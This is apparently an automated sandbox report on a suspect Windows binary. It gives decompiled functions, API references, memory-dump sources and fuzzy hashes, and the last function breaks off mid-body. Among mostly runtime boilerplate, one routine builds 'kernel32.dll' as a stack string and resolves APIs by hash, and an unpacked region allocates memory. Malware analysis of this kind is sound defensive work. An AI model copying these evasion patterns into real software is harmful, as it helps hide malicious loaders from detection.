                    • Part of subcall function 0041FEE8: GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041FF3B
                    • Part of subcall function 0041FEE8: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041FF4D
                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0042001C
                  • SetLastError.KERNEL32(0000006F), ref: 00420033
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressProc$Module$ErrorFileHandleLastName
                  • String ID:
                  • API String ID: 2524245154-3916222277
                  • Opcode ID: d1f6300317608b451b0f1a9f9afcda89f7e431a70b9b6759b68dbed0ea8e864b
                  • Instruction ID: 16c8df534bba0e71afd759dff56f4c83eb178d6d7af711adba3e05cab24aa7f7
                  • Opcode Fuzzy Hash: d1f6300317608b451b0f1a9f9afcda89f7e431a70b9b6759b68dbed0ea8e864b
                  • Instruction Fuzzy Hash: 7E2174709002189AD720DF71E8487EEB7F4FF14324F5046AED069E2191D7785A85DF59
                  Uniqueness

                  Uniqueness Score: 0.52%

                  Control-flow Graph

                  • Graph of the code starting at 2c002d; API calls shown in the graph: GetNativeSystemInfo, VirtualAlloc, VirtualProtect
                  APIs
                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,002C0005), ref: 002C00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002C0005), ref: 002C0113
                  Memory Dump Source
                  • Source File: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2c0000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction ID: 0dde8711315342f266c983668e91e282caa45335e5f9c97fc50be413763f188e
                  • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction Fuzzy Hash: 0BE1E071A14746CFDB24CF69C884B2AB3E0FF84308F18462DE8959B241E774EC65CB91
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Graph of function 41cb71; API calls shown in the graph: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
                  C-Code - Quality: 100%
                  			E0041CB71(intOrPtr __ecx) {
                  				void* _v8;
                  				char _v12;
                  				int _v16;
                  				intOrPtr _v20;
                  				int _v24;
                  				long _t29;
                  				short* _t30;
                  				long _t31;
                  				intOrPtr _t32;
                  				short** _t34;
                  				signed int _t39;
                  				short** _t43;
                  				short* _t45;
                  
                  				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
                  				_v20 = __ecx;
                  				_v8 = 0;
                  				_v12 = 0;
                  				_v24 = 4;
                  				_v16 = 0;
                  				_t34 = 0x44bf98;
                  				_t45 =  *0x44bf98; // 0x43fec0
                  				if(_t45 == 0) {
                  					L14:
                  					return 1;
                  				}
                  				do {
                  					// 0x80000001 is HKEY_CURRENT_USER; samDesired 1 is KEY_QUERY_VALUE (read-only query)
                  					_t29 = RegOpenKeyExW(0x80000001,  *_t34, 0, 1,  &_v8); // executed
                  					if(_t29 != 0) {
                  						goto L12;
                  					}
                  					_t8 =  &(_t34[1]); // 0x44bfb8
                  					_t43 =  *_t8;
                  					while(1) {
                  						_t30 =  *_t43;
                  						if(_t30 == 0) {
                  							break;
                  						}
                  						_t31 = RegQueryValueExW(_v8, _t30, 0,  &_v16,  &_v12,  &_v24); // executed
                  						// value type 4 is REG_DWORD; a non-zero DWORD sets the flag bit, zero clears it
                  						if(_t31 == 0 && _v16 == 4) {
                  							_t14 =  &(_t43[1]); // 0x1
                  							_t39 =  *_t14;
                  							_t32 = _v20;
                  							if(_v12 == 0) {
                  								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) &  !_t39;
                  							} else {
                  								 *(_t32 + 0xa0) =  *(_t32 + 0xa0) | _t39;
                  							}
                  						}
                  						_v12 = 0;
                  						_v24 = 4;
                  						_v16 = 0;
                  						_t43 =  &(_t43[2]);
                  					}
                  					RegCloseKey(_v8); // executed
                  					_v8 = 0;
                  					L12:
                  					_t34 =  &(_t34[2]);
                  				} while ( *_t34 != 0);
                  				goto L14;
                  			}

                  APIs
                  • RegOpenKeyExW.KERNEL32(80000001,0044BF98,00000000,00000001,?), ref: 0041CBB6
                  • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,00000004), ref: 0041CBD6
                  • RegCloseKey.KERNEL32(?), ref: 0041CC1A
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID:
                  • API String ID: 3677997916-0
                  • Opcode ID: ea1195480fbbba6a98d9fb3fc3fe2dfb0237ba004e16e61be3966de3c6b5591e
                  • Instruction ID: d1cec9739bcbb39b65f8e54a44abfe215be5fa0c3725cffd160cc01e19d1f31b
                  • Opcode Fuzzy Hash: ea1195480fbbba6a98d9fb3fc3fe2dfb0237ba004e16e61be3966de3c6b5591e
                  • Instruction Fuzzy Hash: D0211871D40208EFDB15CF85DC85AEEFBB8EF94304F2040AAE45AA6250E3759E84DF55
                  Uniqueness

                  Uniqueness Score: 0.04%

                  Control-flow Graph

                  • Graph of function 4290e0; calls shown in the graph: 4313d0, 42c093
                  C-Code - Quality: 100%
                  			E004290E0() {
                  				intOrPtr _t2;
                  				void* _t4;
                  				signed int* _t5;
                  
                  				_t5 = E004313D0(0x20, 4);
                  				_t2 = E0042C093(_t5); // executed
                  				 *0x451a48 = _t2;
                  				 *0x451a44 = _t2;
                  				if(_t5 != 0) {
                  					 *_t5 =  *_t5 & 0x00000000;
                  					return 0;
                  				} else {
                  					_t4 = 0x18;
                  					return _t4;
                  				}
                  			}

                  APIs
                  • __calloc_crt.LIBCMT ref: 004290E7
                    • Part of subcall function 004313D0: __calloc_impl.LIBCMT ref: 004313E1
                    • Part of subcall function 004313D0: Sleep.KERNEL32(00000000), ref: 004313F8
                  • __encode_pointer.LIBCMT ref: 004290EF
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0A5
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000003,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0BC
                    • Part of subcall function 0042C093: RtlEncodePointer.NTDLL(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0FA
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Value$EncodePointerSleep__calloc_crt__calloc_impl__encode_pointer
                  • String ID:
                  • API String ID: 2812158048-0
                  • Opcode ID: 099ba0099273266afa93c9c998775dbba264b75b7e720abb2867d1201169871e
                  • Instruction ID: eddcd4aae5d6fe95ac814a4f59b5bec93168f2b88cf43eeb86a56ee575f9c656
                  • Opcode Fuzzy Hash: 099ba0099273266afa93c9c998775dbba264b75b7e720abb2867d1201169871e
                  • Instruction Fuzzy Hash: 1AD05B72E457315AF37157767C067D626809750B71F110037F904DA5D1F9B48C4147CC
                  Uniqueness

                  Uniqueness Score: 0.08%

                  Control-flow Graph

                  • Graph of function 41dc8f; calls shown in the graph: 42083d, 420285, GetCurrentThreadId, SetWindowsHookExW
                  C-Code - Quality: 86%
                  			E0041DC8F(void* __esi, void* __eflags) {
                  				void* _t3;
                  				void* _t4;
                  				struct HHOOK__* _t6;
                  				void* _t7;
                  				void* _t8;
                  
                  				_t3 = E0042083D(_t7, _t8, __esi, __eflags);
                  				_t13 =  *((char*)(_t3 + 0x14));
                  				if( *((char*)(_t3 + 0x14)) == 0) {
                  					_push(__esi);
                  					_t4 = E00420285(_t7, _t8, __esi, _t13);
                  					// idHook 0xffffffff (-1) is WH_MSGFILTER; the hook is scoped to the calling thread only
                  					_t6 = SetWindowsHookExW(0xffffffff, E0041DAF7, 0, GetCurrentThreadId()); // executed
                  					 *(_t4 + 0x2c) = _t6;
                  					return _t6;
                  				}
                  				return _t3;
                  			}

                  APIs
                  • GetCurrentThreadId.KERNEL32(?,00427842), ref: 0041DCA2
                  • SetWindowsHookExW.USER32(000000FF,Function_0001DAF7,00000000,00000000), ref: 0041DCB2
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CurrentHookThreadWindows
                  • String ID:
                  • API String ID: 1904029216-0
                  • Opcode ID: a62b3ebce883956cea7f2d3f5852568ac672d1e22f3a5a8ce26a305ec22f6b76
                  • Instruction ID: 14a41e18f83d61efec058bc26898e78cc3e21de305476270d92e2adef75165a7
                  • Opcode Fuzzy Hash: a62b3ebce883956cea7f2d3f5852568ac672d1e22f3a5a8ce26a305ec22f6b76
                  • Instruction Fuzzy Hash: 44D0A7719482206EDB20BB707D0DB5B3E949F01320F14129BF490911D2DA7888818BAE
                  Uniqueness

                  Uniqueness Score: 0.14%

                  Control-flow Graph

                  • Graph of function 4206bd; calls shown in the graph: 42925e, 404820, 405860, 40b71f, 41efd6, 4203af, 4205f3, 420676, 429303
                  C-Code - Quality: 93%
                  			E004206BD(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t49;
                  				intOrPtr _t51;
                  				intOrPtr _t53;
                  				intOrPtr _t63;
                  				intOrPtr _t65;
                  				intOrPtr _t67;
                  				intOrPtr _t72;
                  				void* _t73;
                  				intOrPtr* _t74;
                  				void* _t75;
                  
                  				_t75 = __eflags;
                  				_push(0xc);
                  				E0042925E(E0043952E, __ebx, __edi, __esi);
                  				_t72 = __ecx;
                  				 *((intOrPtr*)(_t73 - 0x14)) = __ecx;
                  				 *((intOrPtr*)(__ecx)) = 0x440738;
                  				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
                  				 *((intOrPtr*)(__ecx + 0x20)) = 0;
                  				_t57 = __ecx + 0x34;
                  				 *((intOrPtr*)(__ecx + 0x24)) = 0;
                  				 *((intOrPtr*)(__ecx + 0x28)) = 0;
                  				E00404820(__ecx + 0x34);
                  				 *((intOrPtr*)(_t72 + 0x40)) = 0;
                  				 *((intOrPtr*)(_t72 + 0x44)) = 0;
                  				 *(_t72 + 0x50) =  *(_t72 + 0x50) | 0xffffffff;
                  				 *((intOrPtr*)(_t73 - 4)) = 0;
                  				 *((intOrPtr*)(_t72 + 0x54)) = 0;
                  				 *((intOrPtr*)(_t72 + 0x68)) = 0;
                  				 *((intOrPtr*)(_t72 + 0x6c)) = 0;
                  				 *((intOrPtr*)(_t72 + 0x28)) = 0x20;
                  				 *((intOrPtr*)(_t72 + 0x20)) = 0x14;
                  				 *((intOrPtr*)(_t72 + 0x18)) = 0;
                  				 *((char*)(_t72 + 0x14)) =  *((intOrPtr*)(_t73 + 8));
                  				 *((char*)(_t73 - 4)) = 2;
                  				E00405860(_t57, _t75, 0x1000); // executed
                  				 *((intOrPtr*)(_t73 - 4)) = 1;
                  				 *((intOrPtr*)(_t72 + 0x30)) = 1;
                  				 *((intOrPtr*)(_t72 + 0x44)) = 0x18;
                  				 *((intOrPtr*)(_t72 + 0x78)) = E0040B71F(_t75, 0xc);
                  				 *_t74 = 0x188;
                  				_t63 = E0041EFD6();
                  				 *((intOrPtr*)(_t73 + 8)) = _t63;
                  				 *((char*)(_t73 - 4)) = 4;
                  				_t76 = _t63;
                  				if(_t63 == 0) {
                  					_t49 = 0;
                  					__eflags = 0;
                  				} else {
                  					_t49 = E004203AF(1, _t63, 0, _t72, _t76);
                  				}
                  				 *((char*)(_t73 - 4)) = 1;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x78)))) = _t49;
                  				_t65 = E0041EFD6(0x64);
                  				 *((intOrPtr*)(_t73 + 8)) = _t65;
                  				 *((char*)(_t73 - 4)) = 5;
                  				_t77 = _t65;
                  				if(_t65 == 0) {
                  					_t51 = 0;
                  					__eflags = 0;
                  				} else {
                  					_t51 = E004205F3(1, _t65, 0, _t72, _t77);
                  				}
                  				 *((char*)(_t73 - 4)) = 1;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x78)) + 4)) = _t51;
                  				_t67 = E0041EFD6(0x14);
                  				 *((intOrPtr*)(_t73 + 8)) = _t67;
                  				 *((char*)(_t73 - 4)) = 6;
                  				_t78 = _t67;
                  				if(_t67 == 0) {
                  					_t53 = 0;
                  					__eflags = 0;
                  				} else {
                  					_t53 = E00420676(1, _t67, 0, _t72, _t78);
                  				}
                  				 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x78)) + 8)) = _t53;
                  				 *((intOrPtr*)(_t72 + 0x7c)) = 1;
                  				 *((intOrPtr*)(_t72 + 0x80)) = 0;
                  				 *((intOrPtr*)(_t72 + 0x84)) = 0;
                  				 *((intOrPtr*)(_t72 + 0x88)) = 0;
                  				return E00429303(_t72);
                  			}

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 004206C4
                    • Part of subcall function 0040B71F: _malloc.LIBCMT ref: 0040B73D
                    • Part of subcall function 0041EFD6: LocalAlloc.KERNEL32(00000040,?,?,0041F3D2,00000010,?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B), ref: 0041EFE0
                    • Part of subcall function 004203AF: __EH_prolog3.LIBCMT ref: 004203B6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
                  • String ID:
                  • API String ID: 1104862767-0
                  • Opcode ID: 34b7269766e8a1f28077c4d949f28dc42f9bfe4fd9dd59ba79e1cea181368471
                  • Instruction ID: a4cb265193a99c2c269700e51152e056293c3cbff11ec4de8c9d78e362c4d40f
                  • Opcode Fuzzy Hash: 34b7269766e8a1f28077c4d949f28dc42f9bfe4fd9dd59ba79e1cea181368471
                  • Instruction Fuzzy Hash: F2318EB0A01B40DFD760DF6A814025AFFE0BF98304F60891FD59A87792C7B9A544CB59
                  Uniqueness

                  Uniqueness Score: 0.04%

                  C-Code - Quality: 82%
                  			E004080A0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
                  				void* _v8;
                  				void* _v12;
                  				signed int _v16;
                  				short _v20;
                  				short _v22;
                  				short _v24;
                  				short _v26;
                  				short _v28;
                  				short _v30;
                  				short _v32;
                  				short _v34;
                  				short _v36;
                  				short _v38;
                  				short _v40;
                  				short _v42;
                  				char _v44;
                  				void* _v48;
                  				signed int _t29;
                  				struct HINSTANCE__* _t41;
                  				signed int _t61;
                  
                  				_t67 = __eflags;
                  				_t29 =  *0x44c364; // 0xa6e2bca1
                  				_v16 = _t29 ^ _t61;
                  				_v8 = 0;
                  				_v48 = 0;
                  				_v12 = 0;
                  				// _v44.._v20: wide-character stack string built one character at a time, spelling "kernel32.dll"
                  				_v44 = 0x6b;
                  				_v42 = 0x65;
                  				_v40 = 0x72;
                  				_v38 = 0x6e;
                  				_v36 = 0x65;
                  				_v34 = 0x6c;
                  				_v32 = 0x33;
                  				_v30 = 0x32;
                  				_v28 = 0x2e;
                  				_v26 = 0x64;
                  				_v24 = 0x6c;
                  				_v22 = 0x6c;
                  				_v20 = 0;
                  				_v48 = E00407FF0(E00407F90( &_v44, __eflags,  &_v44), 0x6fc49b7c);
                  				_v12 = E00407FF0(E00407F90( &_v44, _t67,  &_v44), 0xc97c1fff);
                  				_t41 = LoadLibraryExW(_a4, 0, 0);
                  				_v8 = _v12(_a8);
                  				return E00427DFF(_v8, __ebx, _v16 ^ _t61,  &_v44, __edi, __esi, _t41);
                  			}

                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000000,?), ref: 0040817D
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: ef4e3f2ff3eb2b8509d181c276cc1ebd58e7fca335161a0d1f82af9ea71a60a1
                  • Instruction ID: ae54b4be265e21ae134f77016d1930a8b1da2d415affaa5bcbc638975f7b00a6
                  • Opcode Fuzzy Hash: ef4e3f2ff3eb2b8509d181c276cc1ebd58e7fca335161a0d1f82af9ea71a60a1
                  • Instruction Fuzzy Hash: 6E213E64E142089BEB00DFF4D8417EEB775EF18304F00906DE509FB391EA7A9A1487AA
                  Uniqueness

                  Uniqueness Score: 0.06%

                  C-Code - Quality: 86%
                  			E00406010(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr* _v20;
                  				intOrPtr _v24;
                  				intOrPtr* _v28;
                  				intOrPtr _v32;
                  				intOrPtr _t40;
                  				void* _t44;
                  
                  				_v24 = __ecx;
                  				_v20 = E00405840(_v24);
                  				_v12 =  *((intOrPtr*)(_v20 + 4));
                  				_v28 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v20)) + 0x10))))();
                  				_t40 =  *((intOrPtr*)( *((intOrPtr*)( *_v28))))(_a4, 2); // executed
                  				_v16 = _t40;
                  				if(_v16 == 0) {
                  					E00406000();
                  				}
                  				if(_v12 >= _a4) {
                  					_v32 = _a4;
                  				} else {
                  					_v32 = _v12;
                  				}
                  				_v8 = _v32 + 1;
                  				_t44 = E00405DA0(_v20);
                  				E00405FA0(E00405DA0(_v16), _v8, _t44, _v8);
                  				 *((intOrPtr*)(_v16 + 4)) = _v12;
                  				E004055F0(_v20);
                  				return E00405D80(_v24, _v16);
                  			}












                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: _wmemcpy_s
                  • String ID:
                  • API String ID: 67063488-0
                  • Opcode ID: 83d999910e17adc4ce2e608899040abd549941d644afee2c92b128ca02c69bf7
                  • Instruction ID: 89085cfe1f794eabe7504a54d64f3ab6e25fff30613185d8de56a4d33b2279b5
                  • Opcode Fuzzy Hash: 83d999910e17adc4ce2e608899040abd549941d644afee2c92b128ca02c69bf7
                  • Instruction Fuzzy Hash: 932196B4E005099FCB04EF99C8959AFB7B5FF88304F5081AAE915A7391DA34AE41CF94
                  Uniqueness

                  Uniqueness Score: 0.50%

                  C-Code - Quality: 96%
                  			E0041F599(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t17;
                  				intOrPtr _t19;
                  				intOrPtr _t21;
                  				long* _t24;
                  				intOrPtr _t25;
                  				intOrPtr* _t30;
                  				void* _t31;
                  
                  				_t23 = __ecx;
                  				_t22 = __ebx;
                  				_push(4);
                  				E0042922B(E00439404, __ebx, __edi, __esi);
                  				_t30 = __ecx;
                  				if((0 |  *((intOrPtr*)(_t31 + 8)) != 0x00000000) == 0) {
                  					L1:
                  					E00413DD0(_t23);
                  				}
                  				if( *_t30 == 0) {
                  					_t23 =  *0x44f9b8; // 0x44f9bc
                  					if(_t23 != 0) {
                  						L5:
                  						_t19 = E0041F197(_t23); // executed
                  						 *_t30 = _t19;
                  						if(_t19 == 0) {
                  							goto L1;
                  						}
                  					} else {
                  						 *((intOrPtr*)(_t31 - 0x10)) = 0x44f9bc;
                  						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
                  						_t21 = E0041F2AF(0x44f9bc);
                  						 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
                  						_t23 = _t21;
                  						 *0x44f9b8 = _t21;
                  						if(_t21 == 0) {
                  							goto L1;
                  						} else {
                  							goto L5;
                  						}
                  					}
                  				}
                  				_t24 =  *0x44f9b8; // 0x44f9bc
                  				_t28 = E0041F009(_t24,  *_t30);
                  				_t39 = _t28;
                  				if(_t28 == 0) {
                  					_t17 =  *((intOrPtr*)(_t31 + 8))();
                  					_t25 =  *0x44f9b8; // 0x44f9bc
                  					_t28 = _t17;
                  					E0041F356(_t22, _t25, _t17, _t30, _t39,  *_t30, _t17);
                  				}
                  				return E00429303(_t28);
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041F5A0
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Exception@8H_prolog3Throw
                  • String ID:
                  • API String ID: 3670251406-0
                  • Opcode ID: 3ac3d268d6aaef077082b25c9ea7ce6d9e6f69832c921aa6c43d64ce0de0c15e
                  • Instruction ID: 1f935acb8d0608f5d112bb32aab73b50fff3c02da3f5b22281a840c8b569f305
                  • Opcode Fuzzy Hash: 3ac3d268d6aaef077082b25c9ea7ce6d9e6f69832c921aa6c43d64ce0de0c15e
                  • Instruction Fuzzy Hash: 0A017175610202EBDB14AF75E8017AA76A2BB95359F14443EE85187392EF38CD8BC71C
                  Uniqueness

                  Uniqueness Score: 0.01%

                  APIs
                  • ExitProcess.KERNELBASE(00000000), ref: 0052196E
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: c91d6f3eafcad21bdfdb2da13fbaa76f58c5e28d6601133ce88788043121f449
                  • Instruction ID: b3d5d56a2863a6fa03aa470d6f304b2900ecc9b30246237bdce5614da3aca580
                  • Opcode Fuzzy Hash: c91d6f3eafcad21bdfdb2da13fbaa76f58c5e28d6601133ce88788043121f449
                  • Instruction Fuzzy Hash: A1F0C231D001199BEB10EFB4D805BDFFBB9FF45310F40809AAA0867281FA311A0ACBE5
                  Uniqueness

                  Uniqueness Score: 0.01%

                  C-Code - Quality: 100%
                  			E004153F5(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
                  				void* __edi;
                  				intOrPtr* _t11;
                  				void* _t13;
                  				void* _t16;
                  				intOrPtr _t17;
                  				intOrPtr _t18;
                  
                  				_t18 = _a4;
                  				_t17 = __ecx;
                  				if(_t18 >= 0) {
                  					_t11 = E004282CD(_t13, _t16, __ecx, (_t18 + 1) * _a8 + 0x10); // executed
                  					if(_t11 == 0) {
                  						goto L1;
                  					}
                  					 *(_t11 + 4) =  *(_t11 + 4) & 0x00000000;
                  					 *_t11 = _t17;
                  					 *((intOrPtr*)(_t11 + 0xc)) = 1;
                  					 *((intOrPtr*)(_t11 + 8)) = _t18;
                  					return _t11;
                  				}
                  				L1:
                  				return 0;
                  			}









                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: _malloc
                  • String ID:
                  • API String ID: 1579825452-0
                  • Opcode ID: c631df97d44a5f9399ba7b11fe52b4abd1c23a93cd47459c8e3c4dc88b898cb0
                  • Instruction ID: 96eac3bd80cb15c2f38a00244d9ba988f4f89dd5850f29b070fc849da7ef642b
                  • Opcode Fuzzy Hash: c631df97d44a5f9399ba7b11fe52b4abd1c23a93cd47459c8e3c4dc88b898cb0
                  • Instruction Fuzzy Hash: 82E06D36500A159BC7108F4AE404BD6B7DCDFA1375B26C46BE804CB252CA79E8958BA4
                  Uniqueness

                  Uniqueness Score: 0.33%

                  APIs
                  • IsWow64Process.KERNELBASE(000000FF,?), ref: 00522AE2
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: ProcessWow64
                  • String ID:
                  • API String ID: 2092917072-0
                  • Opcode ID: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction ID: 890256bae5d4826c0f7435f6e434bea0fcbb6ca73656ccfbdb31024454639678
                  • Opcode Fuzzy Hash: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction Fuzzy Hash: 97E04F3490925CFBCB24DF98D8447AD7BB8BF01311F200255EC11936C0D7B69E44E751
                  Uniqueness

                  Uniqueness Score: 0.16%

                  C-Code - Quality: 88%
                  			E0041F075(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t19;
                  				void* _t20;
                  
                  				_push(8);
                  				E0042925E(E004393BE, __ebx, __edi, __esi);
                  				_t19 = __ecx;
                  				if( *__ecx == 0) {
                  					E00420C0D(0x10);
                  					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
                  					if( *__ecx == 0) {
                  						 *__ecx =  *((intOrPtr*)(_t20 + 8))();
                  					}
